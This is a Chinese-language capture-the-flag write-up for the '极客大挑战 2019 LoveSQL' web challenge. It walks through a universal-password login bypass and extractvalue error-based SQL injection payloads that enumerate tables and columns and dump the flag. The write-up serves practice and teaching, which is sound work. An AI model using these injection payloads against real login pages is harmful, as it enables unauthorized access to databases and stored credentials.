当前位置: 首页 > news >正文

练习 16 Web [极客大挑战 2019]LoveSQL

news 来源:原创 2025/5/2 3:20:33

extractvalue(1,concat(‘~’, (‘your sql’) ) )报错注入,注意爆破字段的时候表名有可能是table_name不是table_schema

有登录输入框
常规尝试一下

常规的万能密码,返回了一个“admin的密码”:
Hello admin!
Your password is ‘f04b51f7f1de73ee7860c9eb023ea1c8’
在这里插入图片描述
没有任何有用信息
尝试报错注入 回顾 我的练习6

extractvalue(1,concat('~',(select(database()))))%23
#完整后缀
/check.php
?username=admin
&password=f04b51f7f1de73ee7860c9eb023ea1c8 
'or extractvalue(1,concat('~',(select(database()))))%23

成功返回数据库名’geek’
在这里插入图片描述
那继续沿用爆表:

#查表
select group_concat(table_name) from information_schema.tables where table_schema='geek'
#放到报错函数中
extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='geek')))%23

成功返回表名:应该是第二个用得上"l0ve1ysq1"
在这里插入图片描述
继续爆破字段:
这里还是要注意
最后是where table_name=‘l0ve1ysq1’
不是table_schema

select group_concat(column_name) from information_schema.columns where table_schema=database()

# 这里还是要注意最后是where table_name='l0ve1ysq1',不是table_schema
extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1')))%23

成功,继续看一下内容
在这里插入图片描述

select group_concat(password) fropm 'l0ve1ysq1' where id=1

extractvalue(1,concat('~',(select group_concat(password) from l0ve1ysq1 where id=1)))%23

这里一直尝试到id=16才找到flag 的一部分 '~flag{dba94064-c18c-4c85-8821-30'
id=17是无效的
所以也需要用到right函数显示后半部分 right(password,30)

在这里插入图片描述

extractvalue(1,concat('~',(select group_concat(right(password,30) )from l0ve1ysq1 where id=16)))%23

在这里插入图片描述

'~4-c18c-4c85-8821-301279f9a32a}'

拼接一下即可: flag{dba94064-c18c-4c85-8821-301279f9a32a}

End

相关文章:

  • SpringBoot3整合RabbitMQ之一_消息生产者与消息消费者服务搭建
  • Vue之列表渲染
  • 【虚拟机】Vmware虚拟机桥接 Destination Host Unreachable 问题解决
  • 前端三剑客 —— CSS (第六节)
  • 浅谈HTTP
  • 用html写一个爱心
  • Unix 网络编程, Socket 以及bind(), listen(), accept(), connect(), read()write()五大函数简介
  • Linux第4课 Linux的基本操作
  • windows渗透信息收集
  • 【精品教程】护网HVV实战教程资料合集(持续更新,共20节)
  • Go语言时间编程
  • Android Studio 通过 WIFI 调试手机 app
  • CAD Plant3D 2024 下载地址及安装教程
  • 设计模式之建造者模式:灵活可扩展的对象创建过程
  • 华为审核被拒提示: 您的应用存在(最近任务列表隐藏风险活动)的行为,不符合华为应用市场审核标准
  • kvm、zstack导出qcow2文件
  • python项目练习——14.学生管理系统
  • 在.Net6中用gdal实现第一个功能
  • 4月04日,每日信息差
  • 利用Idea实现Ajax登录(maven工程)
  • 百年传承,再启新程,参天中国迎来2.0时代
  • 浦发银行一季度净利175.98亿增1.02%,不良率微降
  • 辽宁省委书记郝鹏、省长王新伟赶到辽阳火灾事故现场指导善后处置工作
  • 中使馆:奉劝菲方有关人士不要在台湾问题上挑衅,玩火者必自焚
  • 扎克伯格怕“错过风口”?Meta AI数字伴侣被允许与未成年人讨论不当话题
  • 第1现场|无军用物资!伊朗港口爆炸已遇难40人伤1200人